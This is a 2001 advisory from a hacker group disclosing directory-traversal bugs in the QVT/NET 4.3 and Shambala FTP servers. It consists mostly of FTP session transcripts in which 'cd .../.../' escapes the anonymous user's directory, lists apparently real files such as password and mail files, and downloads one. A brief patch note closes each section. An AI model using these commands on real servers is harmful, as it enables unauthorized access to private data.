====================================================================== QVT/NET 4.3 FTP server Directory Traversal Author: alt3kx! Date: 2001-05-22 Site: www.raza-mexicana.org Greet to: _0x90_, dr_fdisk^, Dex, PaTa Teams: Raregazz - X-ploit and S0d vicente F0x no rulas wey! ====================================================================== ------------------------=[Brief Description]=------------------------- QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000. A bug allows any user to change to any directory and see files to PATH also GET files remotely. ----------------------------=[Plataforms]=------------------------------- Windows 9.x Windows NT windows 2000 -----------------------------=[Summary]=--------------------------------- When sending the command "CWD ..." (or "cd ..." in the default FTP client), the server will go one directory up. EXploit: C:\>ftp server.vulnerable.com Connected to server.vulnerable.com. 220 shell FTP server (QVT/Net 4.3) ready. User (server.vulnerable.com:(none)): anonymous 331 Guest login OK, please send real ident as password. Password: 230 Guest login OK, access restrictions apply. ftp> cd .. 501 CWD command not allowed. SO THE BUG... ... ftp>cd .../.../.../.../.../.../ 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes). -rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6 drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup -rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe -rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins . . . . -rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX drwxrwxrwx 1 nobody system 0 May 8 13:17 teens drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp -rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt 226 Transfer complete. ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec. ftp> get raza-alt3kx.txt 200 PORT command successful. 150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes). 226 Transfer complete. ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec. ftp>quit 221 Goodbye. C:\>type raza-alt3kx.txt Bug discovered by alt3kx! C:\> -------------------------------=[Patch]=--------------------------------- The recomended action is to changue the persmissions or define individual directory for users anonymous with files no compromise. -------------------------=[Company Compromise]=-------------------------- Company: http//www.qpc.com ====================================================================== Shambala FTP server Directory Traversal Author: alt3kx! Date: 2001-05-22 Site: www.raza-mexicana.org Greet to: _0x90_, dr_fdisk^, Dex, PaTa Teams: Raregazz - X-ploit and S0d vicente F0x no rulas weyete! ====================================================================== ------------------------=[Brief Description]=------------------------- Shambala FTP Server is an FTP server for Windows 9x/NT/2000. A bug allows any user to change to any directory and see files to PATH also GET files remotely. ----------------------------=[Plataforms]=----------------------------- Windows 9.x Windows NT windows 2000 -----------------------------=[Summary]=--------------------------------- When sending the command "CWD ..." (or "cd ..." in the default FTP client), the server will go one directory up. Exploit: alt3kx@machine:/tmp$ ftp 1.xx.xx.xx Connected to 1.xx.xx.xx. 220 1.xx.xx.xx - Shambala FTP Server Ready. Name (1.xx.xx.xx:Administrator): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp> cd .. 550 Requested action not taken. Permission denied. ftp> pwd 257 "/" is current directory. ftp> dir 200 PORT command successful. 150 Opening data connection. d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx ---------- owner group 283 21-maj-01 17:55 index-_-1_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-2_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-3_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-4_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-5_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-6_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-7_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-8_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-9_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-10_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-11_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-12_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-13_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-14_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-15_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_-16_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_0_0_0.htm ---------- owner group 283 21-maj-01 17:55 index-_0_0_-1.htm ---------- owner group 283 21-maj-01 17:55 .htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-2.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-3.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-4.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-5.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-6.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-7.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-8.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-9.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-10.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-11.htm ---------- owner group 283 21-maj-01 18:08 index-_0_0_-12.htm ---------- owner group 283 21-maj-01 18:08 index-_0_-1_-11.htm ---------- owner group 283 21-maj-01 18:08 index-_1_0_-11.htm ---------- owner group 283 21-maj-01 18:08 index-_-1_0_-11.htm 226 Transfer complete ftp> cd ../ 550 Requested action not taken. Permission denied. ftp> EXPLOIT... ... ftp> cd /.../.../ 257 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening data connection. ---------- owner group 15444 04-maj-01 14:26 SCAN.log ---------- owner group 140340 04-maj-01 14:05 MAILS-PRESIDENCIA.txt ---------- owner group 466944 18-sep-99 09:32 Shambala.exe ---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG ---------- owner group 31 21-maj-01 17:50 passwordsxxx.txt d--------- owner group 0 21-maj-01 17:50 Web 226 Transfer complete. ftp> ftp> cd /.../.../.../.../ 257 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening data connection. ---------- owner group 246928 18-jan-01 13:10 N6Setup.exe d--------- owner group 0 18-jan-01 15:39 Netscape 6 d--------- owner group 0 18-jan-01 14:50 Netscape 6 Setup ---------- owner group 3209110 19-jan-01 10:51 getrgt.exe . . . . . ---------- owner group 168 21-maj-01 19:07 raza-alt3kx.txt ftp> get raza-alt3kx.txt 200 PORT command successful. 150 Opening data connection. 226 Transfer complete. 168 bytes received in 0 seconds (168 bytes/s) ftp> quit 221 Goodbye. alt3kx@machine:/tmp$ cat raza-alt3kx.txt Bug discovered by alt3kx! alt3kx@machine:/tmp$ -------------------------------=[Patch]=------------------------------ The recomended action is to changue the persmissions or define individual directory for users anonymous with files not compromise. -------------------------=[Company Compromise]=----------------------- http://www.evolvable.com